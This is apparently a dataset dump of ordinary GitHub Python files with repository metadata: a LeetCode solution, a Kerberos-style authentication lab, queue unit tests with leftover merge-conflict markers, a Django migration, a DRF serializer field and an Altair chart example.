79b5efdf6370d71bd53e9c32b488757c4e7680f2 | 942583ae8089c5d35c2344ad1d7ae33012349e98 | /lecture-13/removeOuterParentheses.py | f943f5b86a3b516bcf530aaf948aed189eac30df | [] | no_license | ANAMIKA1410/DSA-Live-Python-March-2021 | 1d6b836fcf3828fc1f2e800e793a7e3b71c1b4b4 | 3ffe49060b773a51fbbc0df97df8d1bc29a93afe | refs/heads/main | 2023-06-03T04:11:24.648040 | 2021-06-18T06:15:37 | 2021-06-18T06:15:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | # https://leetcode.com/problems/remove-outermost-parentheses/
class Solution:
def removeOuterParentheses(self, S: str) -> str:
count = 0
solution = []
for ch in S:
if ch == "(":
if count > 0:
solution.append("(")
count += 1
else:
if count > 1:
solution.append(")")
count -= 1
return "".join(solution)
| [
"anujgargcse@gmail.com"
] | anujgargcse@gmail.com |
5b6e25476a7535b980b893d46f952b3f3ddf17ed | bc72bffe27ad7e484283f4aeb33eed260311b301 | /6term/isob/Lab2/AS_server.py | fc060741812d9fbde4afeb5e6942458166e68a01 | [] | no_license | UladzislauB/university-monorepo | 2bb8cd88211b979908ab5b5203d26ef08d9bb983 | 5436fef4301e172d28b3548b8e270a6130ad64b6 | refs/heads/master | 2021-08-19T00:40:35.552857 | 2020-12-11T12:44:04 | 2020-12-11T12:44:04 | 233,095,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | import database
import datetime
import DES
def AS_server(c_id: str):
if c_id not in database.clients:
return {}
k_c = database.clients[c_id]
tgs_id = database.tgs_id
k_c_tgc = database.keys[(c_id, tgs_id)]
tgt = {
'c': c_id,
'tgs': tgs_id,
'time': datetime.datetime.now().timestamp(),
'period': 1000,
'key': k_c_tgc
}
res = {
'tgt': DES.encrypt(str(tgt), database.K_as_tgs),
'key': k_c_tgc
}
return DES.encrypt(str(res), k_c)
| [
"devuladblr@gmail.com"
] | devuladblr@gmail.com |
85bfb89a56d119a13a6f1153053a53772e0223ee | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /GIT-USERS/TOM-Lambda/CSEU3-DataStructures-GP/test_dll_queue.py | 1eb4e8e8557375db7d460e47d829a9a4eaa707f7 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 1,442 | py | import unittest
from dll_queue import Queue
class QueueTests(unittest.TestCase):
def setUp(self):
self.q = Queue()
def test_len_returns_0_for_empty_queue(self):
self.assertEqual(self.q.len(), 0)
def test_len_returns_correct_length_after_enqueue(self):
self.assertEqual(self.q.len(), 0)
self.q.enqueue(2)
self.assertEqual(self.q.len(), 1)
self.q.enqueue(4)
self.assertEqual(self.q.len(), 2)
self.q.enqueue(6)
self.q.enqueue(8)
self.q.enqueue(10)
self.q.enqueue(12)
self.q.enqueue(14)
self.q.enqueue(16)
self.q.enqueue(18)
self.assertEqual(self.q.len(), 9)
def test_empty_dequeue(self):
self.assertIsNone(self.q.dequeue())
self.assertEqual(self.q.len(), 0)
def test_dequeue_respects_order(self):
self.q.enqueue(100)
self.q.enqueue(101)
self.q.enqueue(105)
self.assertEqual(self.q.dequeue(), 100)
self.assertEqual(self.q.len(), 2)
self.assertEqual(self.q.dequeue(), 101)
self.assertEqual(self.q.len(), 1)
self.assertEqual(self.q.dequeue(), 105)
self.assertEqual(self.q.len(), 0)
self.assertIsNone(self.q.dequeue())
self.assertEqual(self.q.len(), 0)
<<<<<<< HEAD
if __name__ == '__main__':
=======
if __name__ == "__main__":
>>>>>>> 23fb4d348bb9c7b7b370cb2afcd785793e3816ea
unittest.main()
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
972927e1509227023dc76a553c145238805ed528 | f5745692fc8843f43da328b1f205b6b51de929bc | /users/migrations/0002_auto_20201125_0318.py | 16cbeda9b1bac567b6c6ec789107b1d692ac1561 | [] | no_license | crowdbotics-apps/asile-22963 | e9b5160cd09af70e9d1c0f377dd40b116e8693cd | 869c4560839d0e9191e87465c35759f0aaf4d4e8 | refs/heads/master | 2023-01-28T07:16:35.309960 | 2020-11-25T08:09:40 | 2020-11-25T08:09:40 | 315,815,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # Generated by Django 2.2.17 on 2020-11-25 03:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("users", "0001_initial"),
]
operations = [
migrations.AlterField(
model_name="user",
name="name",
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
9b4bc07b4f02bc5287540025a51805e38c54c784 | 641f76328bfeb7e54f0793a18c5b7c00595b98fd | /packages/qapi/qapi/serializers/fields.py | 111e482f8ec89fa948d60c5ed78aa6b33e66cbe5 | [
"Apache-2.0"
] | permissive | lianxiaopang/camel-store-api | 1d16060af92eb01607757c0423377a8c94c3a726 | b8021250bf3d8cf7adc566deebdba55225148316 | refs/heads/master | 2020-12-29T13:23:18.118617 | 2020-02-09T08:38:53 | 2020-02-09T08:38:53 | 238,621,246 | 0 | 0 | Apache-2.0 | 2020-02-07T14:28:35 | 2020-02-06T06:17:47 | Python | UTF-8 | Python | false | false | 2,999 | py | """
@author: 郭奕佳
@email: gyj@gzqichang.com
"""
from __future__ import unicode_literals
import json
from collections import OrderedDict
from urllib.parse import urlparse
from django.core.exceptions import ObjectDoesNotExist
from django.utils.encoding import uri_to_iri
from django.urls import NoReverseMatch, Resolver404, get_script_prefix, resolve
from rest_framework import serializers
class ObjectHyperlinkedRelatedField(serializers.HyperlinkedRelatedField):
serializer_class = None
def __init__(self, serializer_class, view_name=None, **kwargs):
if serializer_class is not None:
self.serializer_class = serializer_class
assert self.serializer_class is not None, 'The `serializer_class` argument is required.'
super().__init__(view_name, **kwargs)
def to_internal_value(self, data):
request = self.context.get('request', None)
try:
data = json.loads(data).get("url")
http_prefix = data.startswith(('http:', 'https:'))
except AttributeError:
self.fail('incorrect_type', data_type=type(data).__name__)
if http_prefix:
# If needed convert absolute URLs to relative path
data = urlparse(data).path
prefix = get_script_prefix()
if data.startswith(prefix):
data = '/' + data[len(prefix):]
data = uri_to_iri(data)
try:
match = resolve(data)
except Resolver404:
self.fail('no_match')
try:
expected_viewname = request.versioning_scheme.get_versioned_viewname(
self.view_name, request
)
except AttributeError:
expected_viewname = self.view_name
if match.view_name != expected_viewname:
self.fail('incorrect_match')
try:
return self.get_object(match.view_name, match.args, match.kwargs)
except (ObjectDoesNotExist, TypeError, ValueError):
self.fail('does_not_exist')
def to_representation(self, value):
assert 'request' in self.context, (
"`%s` requires the request in the serializer"
" context. Add `context={'request': request}` when instantiating "
"the serializer." % self.__class__.__name__
)
value = self.queryset.get(id=value.pk)
return self.serializer_class(value, context={'request': self.context["request"]}).data
def get_choices(self, cutoff=None):
queryset = self.get_queryset()
if queryset is None:
# Ensure that field.choices returns something sensible
# even when accessed with a read-only field.
return {}
if cutoff is not None:
queryset = queryset[:cutoff]
return OrderedDict([
(
json.dumps(self.to_representation(item)),
self.display_value(item)
)
for item in queryset
])
| [
"lyh@gzqichang.com"
] | lyh@gzqichang.com |
194e5251b4ed80b96241d230501d08fe42a9d8e1 | d15c56e6e4a73b0fb812d91385aeebab6fc5642e | /statistic_visualize.py | 065ce3ceed0a24b7788a9b0b7a9ea9cfb0df0a61 | [] | no_license | rocketpy/statistic_tutorial | 9d38c6c770613e7d515098b86356b5c2c10efa24 | 9b24e47ecb09044069923360307a4740a9652cc1 | refs/heads/master | 2022-11-23T05:47:42.987060 | 2020-07-17T19:49:40 | 2020-07-17T19:49:40 | 279,663,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | # Altair - declarative statistical visualization library for Python
# Examples of Charts , Histograms , Maps , Interactive Charts , Case Studies : https://altair-viz.github.io/gallery/index.html
# code example , area chart with Gradient , taked from : https://altair-viz.github.io/getting_started/overview.html
import altair as alt
from vega_datasets import data
source = data.stocks()
alt.Chart(source).transform_filter(
'datum.symbol==="GOOG"'
).mark_area(
line={'color':'darkgreen'},
color=alt.Gradient(
gradient='linear',
stops=[alt.GradientStop(color='white', offset=0),
alt.GradientStop(color='darkgreen', offset=1)],
x1=1,
x2=1,
y1=1,
y2=0
)
).encode(
alt.X('date:T'),
alt.Y('price:Q')
)
| [
"noreply@github.com"
] | rocketpy.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.